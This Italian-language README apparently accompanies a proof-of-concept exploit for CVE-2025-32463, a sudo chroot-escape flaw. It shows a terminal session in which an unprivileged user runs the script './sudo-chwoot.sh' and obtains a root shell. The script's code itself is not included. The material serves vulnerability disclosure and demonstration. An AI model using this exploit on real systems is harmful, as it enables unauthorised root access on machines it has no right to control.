
Exploit proof-of-concept per CVE-2025-32463, una vulnerabilità di fuga da chroot in sudo, che consente a utenti non privilegiati di ottenere una shell di root al di fuori dell'ambiente chroot.
Riferimento: https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
Eseguendo il PoC su un server Ubuntu 24.04.2 LTS con Sudo v1.9.15p5, utilizzando un utente non privilegiato senza regole Sudo definite, si ottiene una shell root al di fuori dell'ambiente chroot.
lowpriv@prod:/CVE-2025-32463$ id
uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)
lowpriv@prod:/CVE-2025-32463$ sudo -l
[sudo] password for lowpriv:
Sorry, user lowpriv may not run sudo on prod.
lowpriv@prod:~/CVE-2025-32463$ ./sudo-chwoot.sh
woot!
root@prod:/# id
uid=0(root) gid=0(root) groups=0(root),1001(lowpriv)